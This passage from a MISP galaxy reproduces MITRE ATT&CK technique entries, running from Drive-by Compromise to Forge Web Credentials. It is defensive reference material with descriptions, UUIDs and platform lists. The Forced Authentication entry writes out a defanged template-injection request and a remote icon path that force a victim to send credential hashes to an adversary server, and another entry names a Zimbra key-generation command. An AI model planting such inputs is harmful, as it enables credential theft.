    • In some cases a second visit to the website after the initial scan is required before exploit code is delivered.

Unlike Exploit Public-Facing Application, the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.

Adversaries may also use compromised websites to deliver a user to a malicious application designed to Steal Application Access Tokens, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.[Volexity OceanLotus Nov 2017]

Internal MISP references

UUID d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381 which can be used as unique global reference for Drive-by Compromise in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Dynamic Resolution

Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.

Adversaries may use dynamic resolution for the purpose of Fallback Channels. When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.[Talos CCleanup 2017][FireEye POSHSPY April 2017][ESET Sednit 2017 Activity]

Internal MISP references

UUID 987ad3da-9423-4fe0-a52b-b931c0b8b95f which can be used as unique global reference for Dynamic Resolution in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Email Collection

Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.

Internal MISP references

UUID 3569b783-1be5-414b-adb9-42c47ceee1cc which can be used as unique global reference for Email Collection in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Google Workspace', 'Linux', 'macOS', 'Office 365', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Encrypted Channel

Adversaries may employ an encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.

Internal MISP references

UUID 0e704680-c930-42a7-9caa-5802b8cb2c48 which can be used as unique global reference for Encrypted Channel in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Endpoint Denial of Service

Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes[FireEye OpPoisonedHandover February 2016] and to support other malicious activities, including distraction[FSISAC FraudNetDoS September 2012], hacktivism, and extortion.[Symantec DDoS October 2014]

An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).

To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.

Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.

Botnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.[USNYAG IranianBotnet March 2016]

In cases where traffic manipulation is used, there may be points in the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.[ArsTechnica Great Firewall of China]

For attacks attempting to saturate the providing network, see Network Denial of Service.

Internal MISP references

UUID 8b0caea0-602e-4117-8322-b125150f5c2a which can be used as unique global reference for Endpoint Denial of Service in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Containers', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Escape to Host

Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.[Docker Overview]

There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as unshare and keyctl to escalate privileges and steal secrets.[Docker Bind Mounts][Trend Micro Privileged Container][Intezer Doki July 20][Container Escape][Crowdstrike Kubernetes Container Escape][Keyctl-unmask]

Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as docker.sock, to break out of the container via a Container Administration Command.[Container Escape] Adversaries may also escape via Exploitation for Privilege Escalation, such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.[Windows Server Containers Are Open]

Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, accessing other containers running on the host, or setting up a command and control channel on the host.

Internal MISP references

UUID bebaf25b-9f50-4e3b-96cc-cc55c5765b61 which can be used as unique global reference for Escape to Host in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'Linux', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Establish Accounts

Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.[NEWSCASTER2014][BlackHatRobinSage]

For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.[NEWSCASTER2014][BlackHatRobinSage]

Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for Phishing for Information or Phishing.[Mandiant APT1] In addition, establishing accounts may allow adversaries to abuse free services, such as registering for trial periods to Acquire Infrastructure for malicious purposes.[Free Trial PurpleUrchin]

Internal MISP references

UUID 9a2d6628-0dd7-4f25-a242-b752fcf47ff4 which can be used as unique global reference for Establish Accounts in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Event Triggered Execution

Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.[Backdooring an AWS account][Varonis Power Automate Data Exfiltration][Microsoft DART Case Report 001]

Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.[FireEye WMI 2015][Malware Persistence on OS X][amnesia malware]

Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges.

Internal MISP references

UUID e1e42979-d3cd-461b-afc4-a6373cbf97ba which can be used as unique global reference for Event Triggered Execution in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Execution Guardrails

Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.[FireEye Kevin Mandia Guardrails] Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.[FireEye Outlook Dec 2019]

Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical Virtualization/Sandbox Evasion. While use of Virtualization/Sandbox Evasion may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.

Internal MISP references

UUID aca9cbac-5c11-4050-8d9c-2a947c89a1e8 which can be used as unique global reference for Execution Guardrails in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exfiltration Over Alternative Protocol

Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels.

Exfiltration Over Alternative Protocol can be done using various common operating system utilities such as Net/SMB or FTP.[Palo Alto OilRig Oct 2016] On macOS and Linux curl may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.[20 macOS Common Tools and Techniques]

Many IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or Cloud API.

Internal MISP references

UUID 192d25ea-bae1-48e4-88de-e0acd481ab88 which can be used as unique global reference for Exfiltration Over Alternative Protocol in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Google Workspace', 'IaaS', 'Linux', 'macOS', 'Network', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exfiltration Over C2 Channel

Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.

Internal MISP references

UUID 89203cae-d3f1-4eef-9b5a-29042eb05d19 which can be used as unique global reference for Exfiltration Over C2 Channel in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exfiltration Over Other Network Medium

Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.

Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.

Internal MISP references

UUID d8541e2d-6bdd-4ec0-95c4-c0f657502d5f which can be used as unique global reference for Exfiltration Over Other Network Medium in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exfiltration Over Physical Medium

Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.

Internal MISP references

UUID 36e0e8c0-ed8c-42b5-8bbf-b7cb322bc26f which can be used as unique global reference for Exfiltration Over Physical Medium in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exfiltration Over Web Service

Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.

Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Internal MISP references

UUID 66768217-acdd-4b52-902f-e29483630ad6 which can be used as unique global reference for Exfiltration Over Web Service in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Google Workspace', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exploitation for Client Execution

Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.

Several types exist:

Browser-based Exploitation

Web browsers are a common target through Drive-by Compromise and Spearphishing Link. Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.

Office Applications

Common office and productivity applications such as Microsoft Office are also targeted through Phishing. Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.

Common Third-party Applications

Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.

Internal MISP references

UUID 068df3d7-f788-44e4-9e6b-2ae443af1609 which can be used as unique global reference for Exploitation for Client Execution in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exploitation for Credential Access

Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. 

Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain authenticated access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.[Technet MS14-068][ADSecurity Detecting Forged Tickets] Another example of this is replay attacks, in which the adversary intercepts data packets sent between parties and then later replays these packets. If services don't properly validate authentication requests, these replayed packets may allow an adversary to impersonate one of the parties and gain unauthorized access or privileges.[Bugcrowd Replay Attack][Comparitech Replay Attack][Microsoft Midnight Blizzard Replay Attack]

Such exploitation has been demonstrated in cloud environments as well. For example, adversaries have exploited vulnerabilities in public cloud infrastructure that allowed for unintended authentication token creation and renewal.[Storm-0558 techniques for unauthorized email access]

Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.

Internal MISP references

UUID afdfa503-0464-4b42-a79c-a6fc828492ef which can be used as unique global reference for Exploitation for Credential Access in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exploitation for Defense Evasion

Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.

Adversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for Security Software Discovery. The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.

There have also been examples of vulnerabilities in public cloud infrastructure of SaaS applications that may bypass defense boundaries [Salesforce zero-day in facebook phishing attack], evade security logs [Bypassing CloudTrail in AWS Service Catalog], or deploy hidden infrastructure.[GhostToken GCP flaw]

Internal MISP references

UUID 15b65bf2-dbe5-47bc-be09-ed97684bf391 which can be used as unique global reference for Exploitation for Defense Evasion in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exploitation for Privilege Escalation

Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.

When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.

Adversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).[ESET InvisiMole June 2020][Unit42 AcidBox June 2020] Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via Ingress Tool Transfer or Lateral Tool Transfer.

Internal MISP references

UUID 9cc715d7-9969-485f-87a2-c9f7ed3cc44c which can be used as unique global reference for Exploitation for Privilege Escalation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exploitation of Remote Services

Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.

An adversary may need to determine if the remote system is in a vulnerable state, which may be done through Network Service Discovery or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.

There are several well-known vulnerabilities that exist in common services such as SMB [CIS Multiple SMB Vulnerabilities] and RDP [NVD CVE-2017-0176] as well as applications that may be used within internal networks such as MySQL [NVD CVE-2016-6662] and web server services.[NVD CVE-2014-7169]

Depending on the permissions level of the vulnerable remote service an adversary may achieve Exploitation for Privilege Escalation as a result of lateral movement exploitation as well.

Internal MISP references

UUID 51ff4ada-8a71-4801-9cb8-a6e216eaa4e4 which can be used as unique global reference for Exploitation of Remote Services in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Exploit Public-Facing Application

Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.

Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.[NVD CVE-2016-6662][CIS Multiple SMB Vulnerabilities][US-CERT TA18-106A Network Infrastructure Devices 2018][Cisco Blog Legacy Device Attacks][NVD CVE-2014-7169] Depending on the flaw being exploited this may also involve Exploitation for Defense Evasion or Exploitation for Client Execution.

If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via Escape to Host, or take advantage of weak identity and access management policies.

Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.[Mandiant Fortinet Zero Day][Wired Russia Cyberwar]

For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.[OWASP Top 10][CWE top 25]

Internal MISP references

UUID 4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a which can be used as unique global reference for Exploit Public-Facing Application in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'IaaS', 'Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

External Remote Services

Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as Windows Remote Management and VNC can also be used externally.[MacOS VNC software for Remote Desktop]

Access to Valid Accounts to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.[Volexity Virtual Private Keylogging] Access to remote services may be used as a redundant or persistent access mechanism during an operation.

Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.[Trend Micro Exposed Docker Server][Unit 42 Hildegard Malware]

Internal MISP references

UUID c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4 which can be used as unique global reference for External Remote Services in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Fallback Channels

Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.

Internal MISP references

UUID be8786b3-cd3d-47ef-a9e7-cd3ab3c901a1 which can be used as unique global reference for Fallback Channels in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

File and Directory Discovery

Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.[Windows Commands JPCERT] Custom tools may also be used to gather file and directory information and interact with the Native API. Adversaries may also leverage a Network Device CLI on network devices to gather file and directory information (e.g. dir, show flash, and/or nvram).[US-CERT-TA18-106A]

Some files and directories may require elevated or specific user permissions to access.

Internal MISP references

UUID 1492c4ba-c933-47b8-953d-6de3db8cfce8 which can be used as unique global reference for File and Directory Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

File and Directory Permissions Modification

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.[Hybrid Analysis Icacls1 June 2018][Hybrid Analysis Icacls2 May 2018] File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, Unix Shell Configuration Modification, or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.

Adversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.[new_rust_based_ransomware][bad_luck_blackcat][falconoverwatch_blackcat_attack][blackmatter_blackcat][fsutil_behavior]

Internal MISP references

UUID cb2e4822-2529-4216-b5b8-75158c5f85ff which can be used as unique global reference for File and Directory Permissions Modification in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Financial Theft

Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,[FBI-ransomware] business email compromise (BEC) and fraud,[FBI-BEC] "pig butchering,"[wired-pig butchering] bank hacking,[DOJ-DPRK Heist] and exploiting cryptocurrency networks.[BBC-Ronin]

Adversaries may Compromise Accounts to conduct unauthorized transfers of funds.[Internet crime report 2022] In the case of business email compromise or email fraud, an adversary may utilize Impersonation of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.[FBI-BEC] This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.[VEC]

Extortion by ransomware may occur, for example, when an adversary demands payment from a victim after Data Encrypted for Impact [NYT-Colonial] and Exfiltration of data, followed by threatening to leak sensitive data to the public unless payment is made to the adversary.[Mandiant-leaks] Adversaries may use dedicated leak sites to distribute victim data.[Crowdstrike-leaks]

Due to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as Data Destruction and business disruption.[AP-NotPetya]

Internal MISP references

UUID b9c9fd13-c10c-5e78-aeeb-ac18dc0605f9 which can be used as unique global reference for Financial Theft in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Google Workspace', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Firmware Corruption

Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.[Symantec Chernobyl W95.CIH] Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards.

In general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.[dhs_threat_to_net_devices][cisa_malware_orgs_ukraine] Depending on the device, this attack may also result in Data Destruction.

Internal MISP references

UUID 559c647a-7759-4943-856d-dc717b5a443e which can be used as unique global reference for Firmware Corruption in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Forced Authentication

Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.

The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. [Wikipedia Server Message Block] This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.

Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. [Didier Stevens WebDAV Traffic] [Microsoft Managing WebDAV Security]

Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. Template Injection), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. [GitHub Hashjacking] With access to the credential hash, an adversary can perform off-line Brute Force cracking to gain access to plaintext credentials. [Cylance Redirect to SMB]

There are several different ways this can occur. [Osanda Stealing NetNTLM Hashes] Some specifics from in-the-wild use include:

  • A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. Template Injection). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. [US-CERT APT Energy Oct 2017]
  • A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \[remote address]\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. [US-CERT APT Energy Oct 2017]
Internal MISP references

UUID e732e1d4-fffa-4fc3-b387-47782c821688 which can be used as unique global reference for Forced Authentication in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Forge Web Credentials

Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.

Adversaries may generate these credential materials in order to gain access to web resources. This differs from Steal Web Session Cookie, Steal Application Access Token, and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users.

The generation of web credentials often requires secret values, such as passwords, Private Keys, or other cryptographic seed values.[GitHub AWS-ADFS-Credential-Generator] Adversaries may also forge tokens by taking advantage of features such as the AssumeRole and GetFederationToken APIs in AWS, which allow users to request temporary security credentials (i.e., Temporary Elevated Cloud Access), or the zmprov gdpak command in Zimbra, which generates a pre-authentication key that can be used to generate tokens for any user in the domain.[AWS Temporary Security Credentials][Zimbra Preauth]

Once forged, adversaries may use these web credentials to access resources (ex: Use Alternate Authentication Material), which may bypass multi-factor and other authentication protection mechanisms.[Pass The Cookie][Unit 42 Mac Crypto Cookies January 2019][Microsoft SolarWinds Customer Guidance]

Internal MISP references

UUID d8507187-cea6-4be2-95b4-e875924e58c0 which can be used as unique global reference for Forge Web Credentials in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Gather Victim Host Information

